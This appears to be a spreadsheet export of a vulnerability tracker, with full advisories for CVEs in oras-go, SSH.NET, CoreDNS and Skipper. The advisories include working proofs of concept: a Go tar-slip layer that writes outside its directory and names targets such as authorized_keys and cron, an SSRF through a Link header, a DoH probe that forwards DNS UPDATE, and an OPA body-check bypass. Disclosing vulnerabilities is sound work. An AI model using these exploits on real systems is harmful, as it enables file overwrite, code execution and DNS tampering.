        if err := run(); err != nil {
                fmt.Println("ERROR:", err)
                os.Exit(1)
        }
}
func run() error {
        ctx := context.Background()
        // Victim's working directory for the file store.
        workDir, err := os.MkdirTemp("", "oras-victim-*")
        if err != nil {
                return err
        }
        defer os.RemoveAll(workDir)
        fmt.Println("[*] file.Store working dir:", workDir)
        // Target path the attacker wants to write, OUTSIDE workDir.
        // (Could be ~/.ssh/authorized_keys, ~/.bashrc, /etc/cron.d/x, etc.;
        // a temp path keeps the demo self-contained.)
        outsidePath := filepath.Join(os.TempDir(), "oras-PWNED")
        _ = os.Remove(outsidePath)
        defer os.Remove(outsidePath)
        fmt.Println("[*] attacker target (outside workDir):", outsidePath)
        // The layer's AnnotationTitle. extractTarDirectory uses this as both the
        // in-tar prefix and the on-disk subdir under workDir.
        const title = "out"
        baseAbs := filepath.Join(workDir, title)
        // N nested dirs + a symlink "up" -&gt; N*"../" so that after the kernel
        // follows "up" (landing at baseAbs) the remaining N lexical ".."
        // components climb from baseAbs to "/". N must be &gt;= depth(baseAbs).
        depth := len(strings.Split(strings.Trim(filepath.ToSlash(baseAbs), "/"), "/"))
        fmt.Printf("[*] baseAbs depth = %d, building %d nested dirs\n", depth, depth)
        gz, dgst, size, err := buildMaliciousLayer(title, depth, outsidePath)
        if err != nil {
                return err
        }
        // Descriptor exactly as it would appear in a manifest's "layers" array.
        desc := ocispec.Descriptor{
                MediaType: "application/vnd.oci.image.layer.v1.tar+gzip",
                Digest:    dgst,
                Size:      size,
                Annotations: map[string]string{
                        ocispec.AnnotationTitle: title,
                        file.AnnotationUnpack:   "true",
                },
        }
        // Victim creates a file store with default settings (path traversal DISALLOWED).
        store, err := file.New(workDir)
        if err != nil {
                return err
        }
        defer store.Close()
        fmt.Println("[*] store.AllowPathTraversalOnWrite =", store.AllowPathTraversalOnWrite)
        // This is exactly what oras.Copy() invokes per layer.
        if err := store.Push(ctx, desc, bytes.NewReader(gz)); err != nil {
                return fmt.Errorf("Push: %w", err)
        }
        // Check whether the out-of-tree file was written.
        if data, err := os.ReadFile(outsidePath); err == nil {
                rel, _ := filepath.Rel(workDir, outsidePath)
                fmt.Printf("\n[!] BYPASS: wrote %q to %s\n", string(data), outsidePath)
                fmt.Printf("[!] relative to workDir: %s\n", rel)
                fmt.Println("[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir")
                return nil
        }
        fmt.Println("\n[-] no escape (file not created at", outsidePath, ")")
        return nil
}
// buildMaliciousLayer builds a tar.gz that, when extracted by
// content/file.extractTarDirectory under &lt;workDir&gt;/&lt;title&gt;, writes to outsidePath.
func buildMaliciousLayer(title string, depth int, outsidePath string) ([]byte, digest.Digest, int64, error) {
        var buf bytes.Buffer
        gzw := gzip.NewWriter(&amp;buf)
        tw := tar.NewWriter(gzw)
        // 1. Nested directories: title/d0/d1/.../d{depth-1}
        dirs := make([]string, depth)
        for i := 0; i &lt; depth; i++ {
                dirs[i] = fmt.Sprintf("d%d", i)
        }
        for i := 1; i &lt;= depth; i++ {
                name := title + "/" + strings.Join(dirs[:i], "/")
                if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeDir, Name: name, Mode: 0o755}); err != nil {
                        return nil, "", 0, err
                }
        }
        // 2. "up" symlink at the bottom, pointing back to baseAbs via depth*"../".
        //    Lexically AND on disk this resolves to baseAbs - passes ensureLinkPath.
        upName := title + "/" + strings.Join(dirs, "/") + "/up"
        upTarget := strings.Repeat("../", depth-1) + ".."
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: upName, Linkname: upTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 3. "escape" symlink at title/escape.
        //    Target = d0/.../d{N-1}/up/../.. (N times) /&lt;outsidePath&gt;
        //    LEXICAL clean: the N ".." cancel "up" + (N-1) dirs, leaving
        //      d0/&lt;outsidePath&gt;  - INSIDE baseAbs, so ensureLinkPath accepts it.
        //    KERNEL: d0/.../up follows the symlink to baseAbs, then N*".."
        //      climbs to "/", then appends outsidePath.
        dots := strings.Repeat("../", depth-1) + ".."
        escapeTarget := strings.Join(dirs, "/") + "/up/" + dots + outsidePath
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: title + "/escape", Linkname: escapeTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 4. Regular file entry at title/escape - same path as the symlink.
        //    resolveRelToBase("escape") has dir=="." so the per-component Lstat
        //    loop never runs; writeFile opens with O_CREATE|O_TRUNC (no
        //    O_NOFOLLOW) and writes through the symlink to outsidePath.
        payload := []byte("PWNED-BY-ORAS-TARSLIP")
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeReg, Name: title + "/escape", Mode: 0o644, Size: int64(len(payload))}); err != nil {
                return nil, "", 0, err
        }
        if _, err := tw.Write(payload); err != nil {
                return nil, "", 0, err
        }
        if err := tw.Close(); err != nil {
                return nil, "", 0, err
        }
        if err := gzw.Close(); err != nil {
                return nil, "", 0, err
        }
        data := buf.Bytes()
        return data, digest.FromBytes(data), int64(len(data)), nil
}
```
Expected output (paths vary):
```
[*] file.Store working dir: /tmp/oras-victim-209731351
[*] attacker target (outside workDir): /tmp/oras-PWNED
[*] baseAbs depth = 3, building 3 nested dirs
[*] store.AllowPathTraversalOnWrite = false
[!] BYPASS: wrote "PWNED-BY-ORAS-TARSLIP" to /tmp/oras-PWNED
[!] relative to workDir: ../oras-PWNED
[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir
```
### Impact
**Who is affected:** Any application that pulls or pushes OCI artifacts from an untrusted or attacker-influenced source into a `content/file.Store` — e.g. `oras.Copy(ctx, remoteRepo, ref, file.New(dir), ref, opts)`, the documented primary use of the file store — with default settings (`AllowPathTraversalOnWrite=false`, `SkipUnpack=false`). Downstream consumers include the ORAS CLI (`oras pull` to a directory) and tools built on oras-go that materialise artifact contents on disk.
**What the attacker gains:** Arbitrary file create/overwrite anywhere writable by the pulling process. Practical escalations include overwriting `~/.ssh/authorized_keys`, `~/.bashrc`/`~/.profile`, Git hooks, or (when running as root, e.g. in CI or a controller) `/etc/cron.d/*` or binaries on `$PATH` — i.e. remote code execution on the victim host.
**Preconditions / reachability:** No local preconditions beyond pulling an attacker-controlled artifact; the attacker does **not** need any pre-existing symlink in the victim's working directory (unlike GHSA-8xwf-rjm4-xvhv / CVE-2026-50162, which this issue is distinct from). The attack is delivered over the network via a registry the victim pulls from; no authentication to the victim is required. User interaction is limited to the victim choosing to pull the artifact (`UI:R`).</t>
        </is>
      </c>
      <c r="T1097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85731</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85732</t>
        </is>
      </c>
      <c r="D1098" s="5" t="inlineStr"/>
      <c r="E1098" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1098" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1098" s="5" t="inlineStr"/>
      <c r="H1098" s="5" t="inlineStr"/>
      <c r="I1098" s="5" t="inlineStr"/>
      <c r="J1098" s="5" t="inlineStr"/>
      <c r="K1098" s="5" t="inlineStr"/>
      <c r="L1098" s="5" t="inlineStr">
        <is>
          <t>go:oras.land/oras-go/v2</t>
        </is>
      </c>
      <c r="M1098" s="5" t="inlineStr">
        <is>
          <t>2.6.2</t>
        </is>
      </c>
      <c r="N1098" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1098" s="5" t="inlineStr"/>
      <c r="P1098" s="5" t="inlineStr"/>
      <c r="Q1098" s="5" t="inlineStr"/>
      <c r="R1098" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S1098" s="5" t="inlineStr">
        <is>
          <t>## Summary
oras-go's pagination helper `parseLink()` in `registry/remote/utils.go` follows the `Link` response header from a registry without validating the URL's host or scheme. When a malicious registry returns a `Link` header containing an absolute URL pointing to an arbitrary host (e.g., a cloud metadata endpoint), the client makes GET requests to that host from the victim's network.
This affects all pagination-based listing operations: Tags, Referrers, and Repositories (catalog).
## Root Cause
`parseLink()` at `registry/remote/utils.go:54` calls `resp.Request.URL.Parse(link)` which, for absolute URLs, returns the absolute URL unchanged. The result is passed directly to the next pagination loop iteration where `http.NewRequestWithContext()` creates a GET request to the attacker-specified URL. No host comparison, scheme validation, or IP filtering exists between `parseLink` output and the HTTP request.
## Affected Code Paths
- `registry/remote/repository.go:Tags()` calls `parseLink()` for next page URL
- `registry/remote/repository.go:Referrers()` calls `parseLink()` for next page URL
- `registry/remote/registry.go:Repositories()` calls `parseLink()` for next page URL
## Impact
**Blind SSRF from the victim's network.** A malicious registry operator can force any oras-go client that lists tags, referrers, or repositories to issue GET requests to arbitrary internal endpoints:
- Cloud instance metadata endpoints for service discovery and IAM role enumeration
- Internal HTTP services for port scanning and triggering side effects
- If the victim's credential store maps credentials for the SSRF target host, those credentials are attached to the request (auth.Client looks up creds by request host)
The attacker cannot read the response body (it's parsed as JSON and fails), making this a blind SSRF. However, timing and error differences can confirm internal service existence.
## Attack Chain
1. Victim calls `repo.Tags()` / `repo.Referrers()` / `registry.Repositories()` against attacker-controlled registry
2. Registry returns a valid first page + malicious Link header pointing to an internal endpoint
3. `parseLink()` extracts the absolute URL with zero validation
4. Pagination loop makes GET request to the internal endpoint from victim's network
## PoC
&lt;details&gt;
&lt;summary&gt;Expand PoC&lt;/summary&gt;
```go
// Malicious registry handler for /v2/repo/tags/list:
func handler(w http.ResponseWriter, r *http.Request) {
    // Link header points to cloud metadata or internal service
    w.Header().Set("Link", `&lt;http://internal-service:8080/admin&gt;; rel="next"`)
    w.Header().Set("Content-Type", "application/json")
    json.NewEncoder(w).Encode(map[string][]string{"tags": {"v1"}})
}
// Victim code:
repo, _ := remote.NewRepository("attacker-registry.io/repo")
repo.Tags(ctx, "", func(tags []string) error { return nil })
// Result: GET http://internal-service:8080/admin is made from victim's network
```
&lt;/details&gt;
## Suggested Fix
Validate that the URL returned by `parseLink()` has the same host and scheme as the original request before using it for the next pagination request. Reject cross-host or scheme-downgrade URLs.
Reported by **zx (Jace)**</t>
        </is>
      </c>
      <c r="T1098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85732</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85756</t>
        </is>
      </c>
      <c r="D1099" s="5" t="inlineStr"/>
      <c r="E1099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1099" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1099" s="5" t="inlineStr"/>
      <c r="H1099" s="5" t="inlineStr"/>
      <c r="I1099" s="5" t="inlineStr"/>
      <c r="J1099" s="5" t="inlineStr"/>
      <c r="K1099" s="5" t="inlineStr"/>
      <c r="L1099" s="5" t="inlineStr">
        <is>
          <t>nuget:SSH.NET</t>
        </is>
      </c>
      <c r="M1099" s="5" t="inlineStr">
        <is>
          <t>2026.0.0</t>
        </is>
      </c>
      <c r="N1099" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1099" s="5" t="inlineStr"/>
      <c r="P1099" s="5" t="inlineStr"/>
      <c r="Q1099" s="5" t="inlineStr"/>
      <c r="R1099" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S1099" s="5" t="inlineStr">
        <is>
          <t>## Summary
Default SCP remote-path handling places caller-supplied paths into the command that runs scp on the server. On a shell-based server that command is interpreted by a shell, so an attacker-influenced path that is not quoted to suit that shell can execute as a command as the authenticated SSH user. SSH.NET provides `ScpClient.RemotePathTransformation` to control escaping behaviour (defaulting to `RemotePathTransformation.DoubleQuote`) but cannot guarantee safety for arbitrary remote command interpreters. This is inherent to running scp over a remote shell (cf. CVE-2020-15778).
## Impact
Command execution on the SSH server as the authenticated SSH user, when an application passes an attacker-influenced remote path to ScpClient against a shell-based server.
Exploitation depends on conditions beyond the attacker's control: the remote server must be shell-based, and the attacker-influenced path must be crafted to defeat the quoting applied by the transformation in effect — that is, to use metacharacters that it does not neutralise (for example $(...) or backticks, which survive the default double-quoting on a POSIX shell). A path that does not meet these escaping rules, or a non-shell-based server, does not result in command execution.
## Remediation
The fixed release obsoletes the constructors that silently defaulted the path transformation and adds constructors that require an explicit `IRemotePathTransformation`, so callers are required to choose one that suits their server and trust environment. For POSIX shells, the library provides `RemotePathTransformation.ShellQuote`. The legacy default (`RemotePathTransformation.DoubleQuote`) is unchanged for backwards compatibility. SCP is considered legacy and SFTP, which does not involve a remote shell, is recommended where possible (via `SftpClient`).</t>
        </is>
      </c>
      <c r="T1099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85756</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D1100" s="5" t="inlineStr"/>
      <c r="E1100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1100" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1100" s="5" t="inlineStr"/>
      <c r="H1100" s="5" t="inlineStr"/>
      <c r="I1100" s="5" t="inlineStr"/>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr"/>
      <c r="L1100" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M1100" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N1100" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1100" s="5" t="inlineStr"/>
      <c r="P1100" s="5" t="inlineStr"/>
      <c r="Q1100" s="5" t="inlineStr"/>
      <c r="R1100" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S1100" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS accepted [RFC 2136](https://datatracker.ietf.org/doc/html/rfc2136) UPDATE messages over DoH, DoH3, DoQ, and DNS-over-gRPC, then allowed the `proxy`/`forward` plugin to send them unchanged to an upstream DNS server. UDP, TCP, and DoT rejected the same opcode before plugin dispatch.
If an update-capable upstream trusts CoreDNS's source address or authenticated connection instead of requiring end-to-end TSIG, an unauthenticated client can use CoreDNS to add, replace, or delete DNS records.
### Details
The affected listeners called `dns.Msg.Unpack` without the request policy used by the UDP/TCP server:
- [DoH and DoH3](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155)
- [DoQ](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219)
- [DNS-over-gRPC](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184)
CoreDNS routed the message using its Zone question without checking the opcode. [`forward`](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/forward/forward.go#L113-L118) then passed the original message to the [upstream](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/proxy/connect.go#L150-L167).
By contrast, [`dns.DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) allows only QUERY and NOTIFY. The fix applies that policy to the raw header via [`dnsutil.UnpackRequest`](https://github.com/coredns/coredns/blob/530b0a5ff2ad68cc0421f10dd93568945cc671c9/plugin/pkg/dnsutil/message.go#L13-L23) before any affected transport dispatches the request.
### PoC
The reproducer starts a standard-library synthetic DNS upstream on loopback, sends an unsigned UPDATE over DoH, and reports whether the upstream received the record. It supports both UDP and TCP because the `forward` plugin may select either transport. It does not contact or modify a real authoritative server.
Clone the repository and build the server:
```bash
git clone git@github.com:coredns/coredns.git
cd coredns
git checkout d5e54040ffab9a5c12c6de27b66f59f62b385195 # latest pre-fix commit from main
go build -tags=grpcnotrace -o coredns .
```
Save this as `Corefile.poc`:
```text
https://.:8053 {
    bind 127.0.0.1
    tls plugin/tls/test_cert.pem plugin/tls/test_key.pem
    forward . 127.0.0.1:15354
}
```
Save this as `poc.py`:
```python
#!/usr/bin/env python3
import argparse
import http.client
import queue
import socket
import ssl
import struct
import threading
OPCODE_UPDATE = 5
TYPE_A = 1
CLASS_IN = 1
def encode_name(name):
    return b"".join(bytes((len(label),)) + label.encode() for label in name.rstrip(".").split(".")) + b"\x00"
def update_message():
    zone = encode_name("example.com.") + struct.pack("!HH", 6, CLASS_IN)
    update = (
        encode_name("foo.example.com.")
        + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4)
        + socket.inet_aton("192.0.2.123")
    )
    header = struct.pack("!HHHHHH", 0x1234, OPCODE_UPDATE &lt;&lt; 11, 1, 0, 1, 0)
    return header + zone + update
def read_name(message, offset):
    labels = []
    end = None
    seen = set()
    while True:
        if offset &gt;= len(message) or offset in seen:
            raise ValueError("invalid DNS name")
        seen.add(offset)
        length = message[offset]
        if length &amp; 0xC0 == 0xC0:
            if offset + 1 &gt;= len(message):
                raise ValueError("truncated compression pointer")
            if end is None:
                end = offset + 2
            offset = ((length &amp; 0x3F) &lt;&lt; 8) | message[offset + 1]
            continue
        offset += 1
        if length == 0:
            return ".".join(labels) + ".", end if end is not None else offset
        if length &amp; 0xC0 or offset + length &gt; len(message):
            raise ValueError("invalid DNS label")
        labels.append(message[offset : offset + length].decode("ascii"))
        offset += length
def question_end(message, count):
    offset = 12
    for _ in range(count):
        _, offset = read_name(message, offset)
        offset += 4
        if offset &gt; len(message):
            raise ValueError("truncated question")
    return offset
def parse_update(message):
    _, flags, qdcount, _, nscount, _ = struct.unpack_from("!HHHHHH", message)
    if (flags &gt;&gt; 11) &amp; 0xF != OPCODE_UPDATE or qdcount != 1 or nscount &lt; 1:
        return None
    offset = question_end(message, qdcount)
    name, offset = read_name(message, offset)
    rrtype, rrclass, ttl, rdlength = struct.unpack_from("!HHIH", message, offset)
    offset += 10
    rdata = message[offset : offset + rdlength]
    if rrtype != TYPE_A or rrclass != CLASS_IN or len(rdata) != 4:
        return None
    return name, ttl, socket.inet_ntoa(rdata)
def response_for(message):
    ident, flags, qdcount, _, _, _ = struct.unpack_from("!HHHHHH", message)
    end = question_end(message, qdcount)
    response_flags = flags | 0x8000
    return struct.pack("!HHHHHH", ident, response_flags, qdcount, 0, 0, 0) + message[12:end]
def handle_message(message, peer, received):
    try:
        update = parse_update(message)
        response = response_for(message)
    except (ValueError, struct.error):
        return None
    if update is not None:
        received.put((peer, update))
    return response
def serve_udp(sock, received, stopped):
    while not stopped.is_set():
        try:
            message, peer = sock.recvfrom(65535)
        except socket.timeout:
            continue
        except OSError:
            return
        response = handle_message(message, peer, received)
        if response is not None:
            sock.sendto(response, peer)
def recv_exact(connection, size, stopped):
    data = bytearray()
    while len(data) &lt; size and not stopped.is_set():
        try:
            chunk = connection.recv(size - len(data))
        except socket.timeout:
            continue
        if not chunk:
            return None
        data.extend(chunk)
    return bytes(data) if len(data) == size else None
def serve_tcp(sock, received, stopped):
    while not stopped.is_set():
        try:
            connection, peer = sock.accept()
        except socket.timeout:
            continue
        except OSError:
            return
        with connection:
            connection.settimeout(0.1)
            while not stopped.is_set():
                length = recv_exact(connection, 2, stopped)
                if length is None:
                    break
                message = recv_exact(connection, struct.unpack("!H", length)[0], stopped)
                if message is None:
                    break
                response = handle_message(message, peer, received)
                if response is not None:
                    connection.sendall(struct.pack("!H", len(response)) + response)
def send_doh(host, port, payload, timeout):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(host, port, timeout=timeout, context=context)
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        body = response.read()
        return response.status, len(body)
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser(description="Probe whether CoreDNS forwards RFC 2136 UPDATE over DoH")
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", type=int, default=8053)
    parser.add_argument("--upstream-host", default="127.0.0.1")
    parser.add_argument("--upstream-port", type=int, default=15354)
    parser.add_argument("--timeout", type=float, default=2.0)
    parser.add_argument("--expect", choices=("forwarded", "blocked", "either"), default="either")
    args = parser.parse_args()
    received = queue.Queue()
    stopped = threading.Event()
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(0.1)
    udp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    tcp_sock.settimeout(0.1)
    tcp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock.listen()
    threads = [
        threading.Thread(target=serve_udp, args=(udp_sock, received, stopped), daemon=True),
        threading.Thread(target=serve_tcp, args=(tcp_sock, received, stopped), daemon=True),
    ]
    for thread in threads:
        thread.start()
    payload = update_message()
    try:
        status, response_bytes = send_doh(args.host, args.port, payload, args.timeout)
        try:
            peer, update = received.get(timeout=args.timeout)
        except queue.Empty:
            peer = update = None
    finally:
        stopped.set()
        udp_sock.close()
        tcp_sock.close()
        for thread in threads:
            thread.join(timeout=1)
    print("payload=%d opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123" % len(payload))
    print("http_status=%d response_bytes=%d" % (status, response_bytes))
    if update is None:
        result = "blocked"
        print("upstream_received_update=false")
    else:
        result = "forwarded"
        name, ttl, address = update
        print("upstream_received_update=true source=%s:%d" % peer)
        print("upstream_record=%s %d IN A %s" % (name, ttl, address))
    print("result=%s" % result)
    if args.expect != "either" and args.expect != result:
        raise SystemExit("expected %s, got %s" % (args.expect, result))
if __name__ == "__main__":
    main()
```
Start the vulnerable revision:
```sh
./coredns -conf Corefile.poc
```
In a second terminal, run the probe:
```console
$ python3 poc.py --expect forwarded
payload=60 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=200 response_bytes=29
upstream_received_update=true source=127.0.0.1:52391
upstream_record=foo.example.com. 300 IN A 192.0.2.123
result=forwarded
```
The ephemeral source port varies. The output confirms that the upstream saw the complete UPDATE as a request originating from CoreDNS.
For comparison, build and start CoreDNS with the fix:
```sh
git checkout 530b0a5ff2ad68cc0421f10dd93568945cc671c9 # fix commit from main
go build -tags=grpcnotrace -o coredns-fixed .
./coredns-fixed -conf Corefile.poc
```
The same probe is rejected before reaching the synthetic upstream:
```console
$ python3 poc.py --expect blocked
payload=62 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=400 response_bytes=16
upstream_received_update=false
result=blocked
```
### Impact
Exploitation requires all of the following:
- an attacker can reach a CoreDNS DoH, DoH3, DoQ, or DNS-over-gRPC listener
- the selected `proxy`/`forward` target accepts RFC 2136 UPDATE
- the upstream trusts CoreDNS's source address or connection and does not require an attacker-unknown TSIG
The upstream sees the UPDATE as originating from CoreDNS. A successful attack can redirect traffic, take over names, alter mail routing, or disrupt the writable zone. Requiring and validating end-to-end TSIG prevents the demonstrated attack.</t>
        </is>
      </c>
      <c r="T1100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D1101" s="5" t="inlineStr"/>
      <c r="E1101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1101" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1101" s="5" t="inlineStr"/>
      <c r="H1101" s="5" t="inlineStr"/>
      <c r="I1101" s="5" t="inlineStr"/>
      <c r="J1101" s="5" t="inlineStr"/>
      <c r="K1101" s="5" t="inlineStr"/>
      <c r="L1101" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M1101" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N1101" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1101" s="5" t="inlineStr"/>
      <c r="P1101" s="5" t="inlineStr"/>
      <c r="Q1101" s="5" t="inlineStr"/>
      <c r="R1101" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S1101" s="5" t="inlineStr">
        <is>
          <t>- **Affected component:** `filters/openpolicyagent/openpolicyagent.go` → `ExtractHttpBodyOptionally`; combined with `github.com/open-policy-agent/opa-envoy-plugin` `envoyauth/request.go` → `getParsedBody` / `checkIfHTTPBodyTruncated`. Filter: `opaAuthorizeRequestWithBody`.
- **Affected versions:** `&lt;= 0.27.33` (current HEAD `e7d7014c`). The `truncated_body` mitigation was introduced/recommended in v0.27.26 (advisory GHSA-8qqm-fp2q-v734) and remains bypassable.
- **Fix chain being audited:** CVE-2026-50197 (GHSA-659f-rgp5-w4wf, commit `3152f3b0`) → GHSA-8qqm-fp2q-v734 (docs + code, commit `1be950cd` #4126, v0.27.26). This finding is the third, still-open variant.
## Summary
Skipper's `opaAuthorizeRequestWithBody` filter authorizes requests by handing the (bounded) request body to Open Policy Agent. When a body exceeds `-open-policy-agent-max-request-body-size` (default 1 MB), Skipper truncates it before OPA sees it. Advisory **GHSA-8qqm-fp2q-v734** established that deny-on-presence / body-inspecting policies fail OPEN on oversized bodies, and its remediation instructs policy authors to **guard on `input.attributes.request.http.truncated_body`** (implemented as the top-level `input.truncated_body`):
```rego
default allow := false
allow if {
    input.truncated_body == false
    # ... body-based conditions
}
```
That mitigation is itself incomplete. The `truncated_body` flag is computed by the OPA envoy plugin **only when a `content-length` header is present**. A request sent with `Transfer-Encoding: chunked` (HTTP/1.1) or over HTTP/2 carries **no `content-length`**, so `truncated_body` is left `false` even though Skipper truncated the body. The mitigated policy therefore evaluates `input.truncated_body == false` as *true* and **ALLOWS** the request, while the **full, un-inspected oversized payload is forwarded to the upstream** (Skipper's `bufferedBodyReader` streams the buffered prefix and then continues draining the original body).
The transport that defeats the mitigation — chunked / HTTP-2 without Content-Length — is the **exact transport class the original CVE-2026-50197 was about**; the GHSA-8qqm fix closed the declared-Content-Length variant and its positive-control test only exercised *small* chunked bodies, never *oversized* chunked bodies.
## Root cause
`opa-envoy-plugin/envoyauth/request.go`:
```go
func getParsedBody(...) (any, bool, error) {
    if val, ok := headers["content-type"]; ok {
        if strings.Contains(val, "application/json") {
            ...
            if val, ok := headers["content-length"]; ok {          // &lt;-- only path that sets truncation
                truncated, err := checkIfHTTPBodyTruncated(val, int64(len(body)))
                ...
                if truncated { return nil, true, nil }
            }
            ...
        } else if ... "application/x-www-form-urlencoded" { /* same content-length gate */ }
          else if ... "multipart/form-data"            { /* same content-length gate */ }
    }
    return data, false, nil     // &lt;-- no content-length  ==&gt; truncated_body = false
}
func checkIfHTTPBodyTruncated(contentLength string, bodyLength int64) (bool, error) {
    cl, _ := strconv.ParseInt(contentLength, 10, 64)
    if cl != -1 &amp;&amp; cl &gt; bodyLength { return true, nil }
    return false, nil
}
```
Truncation can only ever be signalled by comparing `content-length` against the received body length. With chunked/HTTP-2 there is no `content-length`, so the comparison is skipped and `truncated_body` is reported `false`. Skipper (`ExtractHttpBodyOptionally`) meanwhile *does* truncate the chunked body to `maxBodyBytes` (it sets `expectedSize = maxBodyBytes` when `req.ContentLength &lt; 0`), producing the exact divergence: OPA is told "not truncated", but the body was truncated, and the backend receives the whole thing.
## Reachability
1. Deployment runs `opaAuthorizeRequestWithBody` with a body-inspecting policy that follows the GHSA-8qqm mitigation (`allow if input.truncated_body == false`). This is the maintainer-recommended configuration (advisory + v0.27.26 docs).
2. Attacker sends a request whose body exceeds `max-request-body-size` using `Transfer-Encoding: chunked` (or HTTP/2). No `content-length` header is present.
3. `ExtractHttpBodyOptionally` reads/truncates the body to `maxBodyBytes`; `rawBody` is the truncated prefix.
4. `AdaptToExtAuthRequest` forwards the lowercased headers (no `content-length`) and the truncated `RawBody` to OPA.
5. `getParsedBody` finds no `content-length` → `truncated_body = false`; for a non-parsed content-type it also returns `parsed_body = null` with no error.
6. Policy: `input.truncated_body == false` is satisfied → `allow = true`.
